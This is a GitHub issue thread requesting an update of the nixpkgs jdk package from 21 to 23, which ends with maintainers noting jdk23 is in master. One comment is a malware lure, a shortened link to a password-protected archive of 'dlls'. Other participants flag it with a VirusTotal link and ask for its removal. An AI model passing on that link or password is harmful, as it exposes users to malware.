### ISSUE TITLE
Update request: jdk 21 → 23

### ISSUE THREAD

**Issue by theoparis** [NixOS/nixpkgs#345220]
- Package name: jdk and/or jdk23
- Latest released version: 21.0.3+9

- Current version on the unstable channel: 21.0.3+9
- Current version on the stable/release channel: 21.0.3+9

- [x] Checked the [nixpkgs pull requests](https://github.com/NixOS/nixpkgs/pulls)

**Notify maintainers**

@edwtjo 

Also, I'm not sure if this should mean updating `jdk` to be 23 or just adding a `jdk23` derivation by itself...

-----

Note for maintainers: Please tag this issue in your PR.

---

Add a :+1: [reaction] to [issues you find important].

[reaction]: https://github.blog/2016-03-10-add-reactions-to-pull-requests-issues-and-comments/
[issues you find important]: https://github.com/NixOS/nixpkgs/issues?q=is%3Aissue+is%3Aopen+sort%3Areactions-%2B1-desc

**Comment by SagarChandra07** [comment]
maybe this will help
https://bit.ly/47P0Nvo
Pass: changeme
I put the necessary dlls in the archive

**Comment by theoparis** [comment]
Someone please delete the above comment by @SagarChandra07 https://www.virustotal.com/gui/file/803ef9e29b6f457ef4c3ef1c946a2dd50def32a4b307afb5a8ea72d05a270086

**Comment by thelabcat** [comment]
I recommend you report the comment for spreading malware.

**Comment by qubitnano** [comment]
jdk23 was added in https://github.com/NixOS/nixpkgs/pull/344544 and is currently in staging

Follow its progress to unstable with https://nixpk.gs/pr-tracker.html?pr=344544

**Comment by tomodachi94** [comment]
`jdk23` is available in master and should be in the next release.
